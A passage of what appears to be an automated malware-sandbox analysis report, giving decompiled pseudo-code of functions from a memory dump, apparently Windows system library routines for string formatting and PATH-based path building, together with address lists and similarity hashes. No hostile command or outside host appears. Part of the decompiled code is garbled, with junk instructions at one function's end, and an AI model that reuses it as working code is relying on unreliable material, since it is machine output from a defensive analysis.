										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L0196DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E0195B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E0195B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E0195E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E0195A890() != 0) {
					goto L6;
				}
				goto L3;
			}

0x0191b171
0x0191b171
0x0191b171
0x0191b171
0x0191b171
0x0191b176
0x0191b17b
0x0191b180
0x0191b186
0x0191b18f
0x0191b198
0x0191b1a4
0x0191b1aa
0x01974802
0x01974802
0x01974805
0x0197480c
0x0197480e
0x0191b1d1
0x0191b1d3
0x0191b1de
0x0191b1de
0x01974817
0x0197481e
0x01974820
0x01974822
0x01974822
0x01974824
0x01974824
0x0197482a
0x00000000
0x00000000
0x01974835
0x0197483a
0x0197483d
0x0197483f
0x01974842
0x01974842
0x01974842
0x01974846
0x0197484c
0x0197484e
0x01974851
0x01974851
0x01974853
0x01974854
0x01974854
0x01974858
0x0197485a
0x0197485a
0x0197485d
0x0197485f
0x01974861
0x01974861
0x01974866
0x0197486b
0x0197486e
0x01974871
0x01974876
0x01974876
0x01974878
0x0197487b
0x01974884
0x01974884
0x00000000
0x0197487d
0x0197487d
0x01974882
0x01974889
0x01974889
0x0197488f
0x01974891
0x019748e0
0x019748e2
0x019748e4
0x019748e4
0x019748e7
0x019748e7
0x019748ed
0x019748f4
0x019748f6
0x01974951
0x01974951
0x01974953
0x01974953
0x01974956
0x01974956
0x01974958
0x01974959
0x01974959
0x0197495d
0x0197495d
0x0197495f
0x0197495f
0x01974965
0x01974969
0x019749ba
0x019749ba
0x019749c1
0x019749c5
0x019749cc
0x019749d4
0x019749d7
0x019749da
0x019749e4
0x019749e5
0x019749f3
0x01974a02
0x00000000
0x01974a02
0x01974972
0x01974974
0x00000000
0x00000000
0x01974976
0x01974979
0x01974982
0x01974983
0x01974984
0x0197498b
0x0197498d
0x01974991
0x01974993
0x01974999
0x0197499d
0x019749a2
0x019749a2
0x019749a2
0x01974999
0x019749ac
0x00000000
0x019749b3
0x019748f8
0x019748fe
0x00000000
0x00000000
0x00000000
0x019748fe
0x01974895
0x0197489c
0x019748ad
0x019748b2
0x019748b5
0x019748b7
0x019748ba
0x019748bc
0x019748c6
0x019748c6
0x019748cb
0x019748d1
0x019748d4
0x019748d8
0x019748d8
0x00000000
0x019748d8
0x019748be
0x019748c0
0x00000000
0x00000000
0x019748c2
0x00000000
0x00000000
0x00000000
0x019748c4
0x00000000
0x01974882
0x0197487b
0x01974904
0x01974906
0x00000000
0x00000000
0x01974908
0x0197490e
0x00000000
0x00000000
0x01974910
0x01974917
0x01974917
0x00000000
0x01974917
0x0191b1ba
0x019747f9
0x019747fc
0x00000000
0x00000000
0x00000000
0x019747fc
0x0191b1c0
0x0191b1c0
0x0191b1c3
0x0191b1cb
0x00000000
0x00000000
0x00000000

APIs

_vswprintf_s.LIBCMT ref: 019748AD

Memory Dump Source

Source File: 00000004.00000002.277013973.00000000018F0000.00000040.00000001.sdmp, Offset: 018F0000, based on PE: true

Similarity

API ID: _vswprintf_s
String ID:
API String ID: 677850445-0
Opcode ID: b8d42c0ff4c9d5724e918a8077c7757ae774b4dcb2b85e59b90cc59b130d89ff
Instruction ID: 39e1d6e3d08edbf4bc6b5f63b10c3caeeb6f05467f0717abc56c8719a71a3016
Opcode Fuzzy Hash: b8d42c0ff4c9d5724e918a8077c7757ae774b4dcb2b85e59b90cc59b130d89ff
Instruction Fuzzy Hash: BC51B071D0025A8FEB32CF68C845BAEBBB5BF45710F1141A9D85DAB283D7714981CB92

Uniqueness

Uniqueness Score: -1.00%

Function 01942581, Relevance: 1.6, Strings: 1, Instructions: 329
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E01942581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, char _a1530200464, char _a1546912144) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t256;
				signed int _t260;
				void* _t265;
				signed int _t266;
				signed int _t267;
				signed int _t268;
				void* _t270;
				signed int _t277;
				signed int _t279;
				intOrPtr _t281;
				signed int _t284;
				signed int _t291;
				signed int _t294;
				signed int _t302;
				intOrPtr _t308;
				signed int _t310;
				signed int _t312;
				void* _t313;
				void* _t314;
				signed int _t315;
				unsigned int _t318;
				signed int _t322;
				void* _t323;
				signed int _t324;
				signed int _t328;
				intOrPtr _t341;
				signed int _t350;
				signed int _t352;
				signed int _t353;
				signed int _t357;
				signed int _t358;
				signed int _t360;
				signed int _t362;
				signed int _t365;
				signed int _t366;
				signed int _t368;
				signed int _t369;
				void* _t375;

				_t362 = _t365;
				_t366 = _t365 - 0x4c;
				_v8 =  *0x1a0d360 ^ _t362;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t357 = 0x1a0b2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t318 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t308 = 0x48;
				_t338 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
				_t350 = 0;
				_v37 = _t338;
				if(_v48 <= 0) {
					L16:
					_t45 = _t308 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t358 = 0xc0000106;
						goto L32;
					} else {
						_t357 = L01934620(_t318,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t308);
						_v52 = _t357;
						__eflags = _t357;
						if(_t357 == 0) {
							_t358 = 0xc0000017;
							goto L32;
						} else {
							 *(_t357 + 0x44) =  *(_t357 + 0x44) & 0x00000000;
							_t50 = _t357 + 0x48; // 0x48
							_t352 = _t50;
							_t338 = _v32;
							 *((intOrPtr*)(_t357 + 0x3c)) = _t308;
							_t310 = 0;
							 *((short*)(_t357 + 0x30)) = _v48;
							__eflags = _t338;
							if(_t338 != 0) {
								 *(_t357 + 0x18) = _t352;
								__eflags = _t338 - 0x1a08478;
								 *_t357 = ((0 | _t338 == 0x01a08478) - 0x00000001 & 0xfffffffb) + 7;
								E0195F3E0(_t352,  *((intOrPtr*)(_t338 + 4)),  *_t338 & 0x0000ffff);
								_t338 = _v32;
								_t366 = _t366 + 0xc;
								_t310 = 1;
								__eflags = _a8;
								_t352 = _t352 + (( *_t338 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t302 = E019A39F2(_t352);
									_t338 = _v32;
									_t352 = _t302;
								}
							}
							_t322 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t358 = _v68;
								__eflags = 0;
								 *((short*)(_t352 - 2)) = 0;
								goto L32;
							} else {
								_t312 = _t357 + _t310 * 4;
								_v56 = _t312;
								do {
									__eflags = _t338;
									if(_t338 != 0) {
										_t256 =  *(_v60 + _t322 * 4);
										__eflags = _t256;
										if(_t256 == 0) {
											goto L30;
										} else {
											__eflags = _t256 == 5;
											if(_t256 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t312 =  *(_v60 + _t322 * 4);
										 *(_t312 + 0x18) = _t352;
										_t260 =  *(_v60 + _t322 * 4);
										__eflags = _t260 - 8;
										if(_t260 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t260 * 4 +  &M01942959))) {
												case 0:
													__ax =  *0x1a08488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E0195F3E0(__edi,  *0x1a0848c, __ax & 0x0000ffff);
														__eax =  *0x1a08488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E0195F3E0(_t352, _v80, _v64);
													_t297 = _v64;
													goto L26;
												case 2:
													 *0x1a08480 & 0x0000ffff = E0195F3E0(__edi,  *0x1a08484,  *0x1a08480 & 0x0000ffff);
													__eax =  *0x1a08480 & 0x0000ffff;
													__eax = ( *0x1a08480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E0195F3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E0195F3E0(_t352, _v76, _v36);
														_t297 = _v36;
													}
													L26:
													_t366 = _t366 + 0xc;
													_t352 = _t352 + (_t297 >> 1) * 2 + 2;
													__eflags = _t352;
													L27:
													_push(0x3b);
													_pop(_t299);
													 *((short*)(_t352 - 2)) = _t299;
													goto L28;
												case 6:
													__ebx =  *0x1a0575c;
													__eflags = __ebx - 0x1a0575c;
													if(__ebx != 0x1a0575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E0195F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0x1a0575c;
														} while (__ebx != 0x1a0575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x1a08478 & 0x0000ffff = E0195F3E0(__edi,  *0x1a0847c,  *0x1a08478 & 0x0000ffff);
													__eax =  *0x1a08478 & 0x0000ffff;
													__eax = ( *0x1a08478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E019A39F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x1a06e58 & 0x0000ffff = E0195F3E0(__edi,  *0x1a06e5c,  *0x1a06e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x1a06e58 & 0x0000ffff;
													__eax = ( *0x1a06e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t322 = _v16;
													_t338 = _v32;
													L29:
													_t312 = _t312 + 4;
													__eflags = _t312;
													_v56 = _t312;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t322 = _t322 + 1;
									_v16 = _t322;
									__eflags = _t322 - _v48;
								} while (_t322 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t260 =  *(_v60 + _t350 * 4);
						if(_t260 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t260 * 4 +  &M01942935))) {
							case 0:
								__ax =  *0x1a08488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t338 =  &_v64;
								_v80 = E01942E3E(0,  &_v64);
								_t308 = _t308 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x1a08480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x1a08480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E0192EEF0(0x1a079a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E0192EB70(__ecx, 0x1a079a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t234 = _v72;
											__eflags = _t234;
											if(_t234 != 0) {
												L019377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t234);
											}
											_t235 = _v52;
											__eflags = _t235;
											if(_t235 != 0) {
												__eflags = _t358;
												if(_t358 < 0) {
													L019377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t235);
													_t235 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t318 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x1a07b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L01934620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E0192EB70(__ecx, 0x1a079a0);
										__eax = _v52;
										L36:
										_pop(_t351);
										_pop(_t359);
										__eflags = _v8 ^ _t362;
										_pop(_t309);
										return E0195B640(_t235, _t309, _v8 ^ _t362, _t338, _t351, _t359);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t304 = _v56;
								if(_v56 != 0) {
									_t338 =  &_v36;
									_t306 = E01942E3E(_t304,  &_v36);
									_t318 = _v36;
									_v76 = _t306;
								}
								if(_t318 == 0) {
									goto L44;
								} else {
									_t308 = _t308 + 2 + _t318;
								}
								goto L14;
							case 6:
								__eax =  *0x1a05764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x1a08478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x1a08478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x1a06e58 & 0x0000ffff;
								__eax = ( *0x1a06e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t350 = _t350 + 1;
								if(_t350 >= _v48) {
									goto L16;
								} else {
									_t338 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					_t323 = 0x25;
					asm("int 0x29");
					asm("out 0x28, al");
					_t368 = _t260;
					 *((intOrPtr*)(_t357 + 0x28)) =  *((intOrPtr*)(_t357 + 0x28)) + _t368;
					_t369 = _t366;
					asm("daa");
					 *_t357 =  *_t357 + _t362;
					_t265 = _t368 + _t369;
					 *((intOrPtr*)(_t357 + 0x28)) =  *((intOrPtr*)(_t357 + 0x28)) + _t265;
					_t266 = _t369;
					 *0x1f019426 =  *0x1f019426 + _t266;
					_pop(_t313);
					_t267 = _t266;
					 *((intOrPtr*)(_t267 +  &_a1530200464)) =  *((intOrPtr*)(_t267 +  &_a1530200464)) + _t338;
					_t268 = _t267;
					 *_t338 =  *_t338 + _t268;
					 *((intOrPtr*)(_t323 + _t268 + 0x1942880)) =  *((intOrPtr*)(_t323 + _t268 + 0x1942880)) - _t338;
					_t270 = _t265;
					 *_t357 =  *_t357 + _t313;
					 *((intOrPtr*)(_t323 + _t270 + 0x194284e)) =  *((intOrPtr*)(_t323 + _t270 + 0x194284e)) - (_t268 *  *_t352 >> 0x20);
					asm("daa");
					_pop(_t314);
					 *((intOrPtr*)(_t268 *  *_t352 + _t313 +  &_a1546912144)) =  *((intOrPtr*)(_t268 *  *_t352 + _t313 +  &_a1546912144)) + _t357;
					_t375 = _t270 + _t323;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x19eff00);
					E0196D08C(_t314, _t352, _t357);
					_v44 =  *[fs:0x18];
					_t353 = 0;
					 *_a24 = 0;
					_t315 = _a12;
					__eflags = _t315;
					if(_t315 == 0) {
						_t277 = 0xc0000100;
					} else {
						_v8 = 0;
						_t360 = 0xc0000100;
						_v52 = 0xc0000100;
						_t279 = 4;
						while(1) {
							_v40 = _t279;
							__eflags = _t279;
							if(_t279 == 0) {
								break;
							}
							_t328 = _t279 * 0xc;
							_v48 = _t328;
							__eflags = _t315 -  *((intOrPtr*)(_t328 + 0x18f1664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t294 = E0195E5C0(_a8,  *((intOrPtr*)(_t328 + 0x18f1668)), _t315);
									_t375 = _t375 + 0xc;
									__eflags = _t294;
									if(__eflags == 0) {
										_t360 = E019951BE(_t315,  *((intOrPtr*)(_v48 + 0x18f166c)), _a16, _t353, _t360, __eflags, _a20, _a24);
										_v52 = _t360;
										break;
									} else {
										_t279 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t279 = _t279 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t360;
						__eflags = _t360;
						if(_t360 < 0) {
							__eflags = _t360 - 0xc0000100;
							if(_t360 == 0xc0000100) {
								_t324 = _a4;
								__eflags = _t324;
								if(_t324 != 0) {
									_v36 = _t324;
									__eflags =  *_t324 - _t353;
									if( *_t324 == _t353) {
										_t360 = 0xc0000100;
										goto L76;
									} else {
										_t341 =  *((intOrPtr*)(_v44 + 0x30));
										_t281 =  *((intOrPtr*)(_t341 + 0x10));
										__eflags =  *((intOrPtr*)(_t281 + 0x48)) - _t324;
										if( *((intOrPtr*)(_t281 + 0x48)) == _t324) {
											__eflags =  *(_t341 + 0x1c);
											if( *(_t341 + 0x1c) == 0) {
												L106:
												_t360 = E01942AE4( &_v36, _a8, _t315, _a16, _a20, _a24);
												_v32 = _t360;
												__eflags = _t360 - 0xc0000100;
												if(_t360 != 0xc0000100) {
													goto L69;
												} else {
													_t353 = 1;
													_t324 = _v36;
													goto L75;
												}
											} else {
												_t284 = E01926600( *(_t341 + 0x1c));
												__eflags = _t284;
												if(_t284 != 0) {
													goto L106;
												} else {
													_t324 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t360 = E01942C50(_t324, _a8, _t315, _a16, _a20, _a24, _t353);
											L76:
											_v32 = _t360;
											goto L69;
										}
									}
									goto L108;
								} else {
									E0192EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t360 = _a24;
									_t291 = E01942AE4( &_v36, _a8, _t315, _a16, _a20, _t360);
									_v32 = _t291;
									__eflags = _t291 - 0xc0000100;
									if(_t291 == 0xc0000100) {
										_v32 = E01942C50(_v36, _a8, _t315, _a16, _a20, _t360, 1);
									}
									_v8 = _t353;
									E01942ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t277 = _t360;
					}
					L70:
					return E0196D0D1(_t277);
				}
				L108:
			}

0x01942584
0x01942586
0x01942590
0x01942596
0x01942597
0x01942598
0x01942599
0x0194259e
0x019425a4
0x019425a9
0x019425ac
0x019425ae
0x019425b1
0x019425b2
0x019425b5
0x019425b8
0x019425bb
0x019425bc
0x019425bf
0x019425c2
0x019425c5
0x019425c6
0x019425cb
0x019425ce
0x019425d8
0x019425dd
0x019425de
0x019425e1
0x019425e3
0x019425e9
0x019426da
0x019426da
0x019426dd
0x019426e2
0x01985b56
0x00000000
0x019426e8
0x019426f9
0x019426fb
0x019426fe
0x01942700
0x01985b60
0x00000000
0x01942706
0x01942706
0x0194270a
0x0194270a
0x0194270d
0x01942713
0x01942716
0x01942718
0x0194271c
0x0194271e
0x01985b6c
0x01985b6f
0x01985b7f
0x01985b89
0x01985b8e
0x01985b93
0x01985b96
0x01985b9c
0x01985ba0
0x01985ba3
0x01985bab
0x01985bb0
0x01985bb3
0x01985bb3
0x01985ba3
0x01942724
0x01942726
0x01942729
0x0194272c
0x0194279d
0x0194279d
0x019427a0
0x019427a2
0x00000000
0x0194272e
0x0194272e
0x01942731
0x01942734
0x01942734
0x01942736
0x01985bc1
0x01985bc1
0x01985bc4
0x00000000
0x01985bca
0x01985bca
0x01985bcd
0x00000000
0x01985bd3
0x00000000
0x01985bd3
0x01985bcd
0x0194273c
0x0194273c
0x01942742
0x01942747
0x0194274a
0x0194274d
0x01942750
0x00000000
0x01942756
0x01942756
0x00000000
0x01942902
0x01942908
0x0194290b
0x00000000
0x01942911
0x0194291c
0x01942921
0x00000000
0x01942921
0x00000000
0x00000000
0x01942880
0x01942887
0x0194288c
0x00000000
0x00000000
0x01942805
0x0194280a
0x01942814
0x01942816
0x00000000
0x00000000
0x0194281e
0x01942821
0x01942823
0x00000000
0x01942829
0x01942829
0x01942831
0x0194283c
0x0194283e
0x00000000
0x0194283e
0x00000000
0x00000000
0x0194284e
0x01942850
0x01942851
0x01942854
0x01942857
0x0194285a
0x0194285c
0x0194285d
0x00000000
0x00000000
0x0194275d
0x01942761
0x00000000
0x01942767
0x0194276e
0x01942773
0x01942773
0x01942776
0x01942778
0x0194277e
0x0194277e
0x01942781
0x01942781
0x01942783
0x01942784
0x00000000
0x00000000
0x01985bd8
0x01985bde
0x01985be4
0x01985be6
0x01985be8
0x01985be9
0x01985bee
0x01985bf8
0x01985bff
0x01985c01
0x01985c04
0x01985c07
0x01985c0b
0x01985c0d
0x01985c0d
0x01985c15
0x01985c18
0x01985c1b
0x01985c1b
0x01985c1e
0x00000000
0x00000000
0x019428c3
0x019428c8
0x019428d2
0x019428d4
0x019428d8
0x019428db
0x01985c26
0x01985c28
0x01985c2d
0x01985c2d
0x00000000
0x00000000
0x01985c34
0x01985c36
0x01985c49
0x01985c4e
0x01985c54
0x01985c5b
0x01985c5d
0x01985c60
0x01942788
0x01942788
0x0194278b
0x0194278e
0x0194278e
0x0194278e
0x01942791
0x00000000
0x00000000
0x01942756
0x01942750
0x00000000
0x01942794
0x01942794
0x01942795
0x01942798
0x01942798
0x00000000
0x01942734
0x0194272c
0x01942700
0x019425ef
0x019425ef
0x019425ef
0x019425f2
0x019425f8
0x00000000
0x00000000
0x019425fe
0x00000000
0x019428e6
0x019428ec
0x019428ef
0x019428f5
0x019428f8
0x019428f8
0x00000000
0x019428f8
0x00000000
0x00000000
0x01942866
0x01942866
0x01942876
0x01942879
0x00000000
0x00000000
0x019427e0
0x019427e7
0x019427e9
0x019427eb
0x01985afd
0x00000000
0x01985afd
0x00000000
0x00000000
0x01942633
0x01942638
0x0194263b
0x0194263c
0x0194263e
0x01942640
0x01942642
0x01942647
0x01942649
0x0194264e
0x01942650
0x01942653
0x01942659
0x019426a2
0x019426a7
0x019426ac
0x019426b2
0x01985b11
0x01985b15
0x01985b17
0x00000000
0x019426b8
0x019426b8
0x019426ba
0x019427a6
0x019427a6
0x019427a9
0x019427ab
0x019427b9
0x019427b9
0x019427be
0x019427c1
0x019427c3
0x019427c5
0x019427c7
0x01985c74
0x01985c79
0x01985c79
0x019427c7
0x00000000
0x019426c0
0x019426c0
0x019426c3
0x019426c6
0x019426c6
0x019426c9
0x019426c9
0x00000000
0x019426c9
0x019426ba
0x0194265b
0x0194265b
0x0194265e
0x01942667
0x0194266d
0x01942677
0x0194267c
0x0194267f
0x01942681
0x01985b49
0x01985b4e
0x019427cd
0x019427d0
0x019427d1
0x019427d2
0x019427d4
0x019427dd
0x01942687
0x01942687
0x0194268a
0x0194268b
0x0194268e
0x0194268f
0x01942691
0x01942696
0x01942698
0x0194269d
0x0194269f
0x00000000
0x0194269f
0x01942681
0x00000000
0x00000000
0x01942846
0x00000000
0x00000000
0x01942605
0x0194260a
0x0194260c
0x01942611
0x01942616
0x01942619
0x01942619
0x0194261e
0x00000000
0x01942624
0x01942627
0x01942627
0x00000000
0x00000000
0x01985b1f
0x00000000
0x00000000
0x01942894
0x0194289b
0x0194289d
0x019428a1
0x01985b2b
0x01985b2e
0x01985b2e
0x019428a7
0x019428a9
0x01985b04
0x01985b09
0x01985b09
0x01985b09
0x00000000
0x00000000
0x01985b35
0x01985b3c
0x019428fb
0x019428fb
0x019426cc
0x019426cc
0x019426d0
0x00000000
0x019426d2
0x019426d2
0x00000000
0x019426d2
0x00000000
0x00000000
0x019425fe
0x0194292d
0x0194292f
0x01942930
0x01942935
0x01942937
0x01942938
0x0194293b
0x0194293e
0x01942940
0x01942942
0x01942944
0x01942947
0x01942948
0x0194294e
0x0194294f
0x01942950
0x01942957
0x01942958
0x0194295a
0x01942963
0x01942964
0x01942966
0x0194296e
0x01942972
0x01942974
0x0194297c
0x0194297e
0x0194297f
0x01942980
0x01942981
0x01942982
0x01942983
0x01942984
0x01942985
0x01942986
0x01942987
0x01942988
0x01942989
0x0194298a
0x0194298b
0x0194298c
0x0194298d
0x0194298e
0x0194298f
0x01942990
0x01942992
0x01942997
0x019429a3
0x019429a6
0x019429ab
0x019429ad
0x019429b0
0x019429b2
0x01985c80
0x019429b8
0x019429b8
0x019429bb
0x019429c0
0x019429c5
0x019429c6
0x019429c6
0x019429c9
0x019429cb
0x00000000
0x00000000
0x019429cd
0x019429d0
0x019429d9
0x019429db
0x019429dd
0x01942a7f
0x01942a84
0x01942a87
0x01942a89
0x01985ca1
0x01985ca3
0x00000000
0x01942a8f
0x01942a8f
0x00000000
0x01942a8f
0x00000000
0x019429e3
0x019429e3
0x019429e3
0x00000000
0x019429e3
0x019429dd
0x00000000
0x019429db
0x019429e6
0x019429e9
0x019429eb
0x019429ed
0x019429f3
0x019429f5
0x019429f8
0x019429fa
0x01942a97
0x01942a9a
0x01942a9d
0x01942add
0x00000000
0x01942a9f
0x01942aa2
0x01942aa5
0x01942aa8
0x01942aab
0x01985cab
0x01985caf
0x01985cc5
0x01985cda
0x01985cdc
0x01985cdf
0x01985ce5
0x00000000
0x01985ceb
0x01985ced
0x01985cee
0x00000000
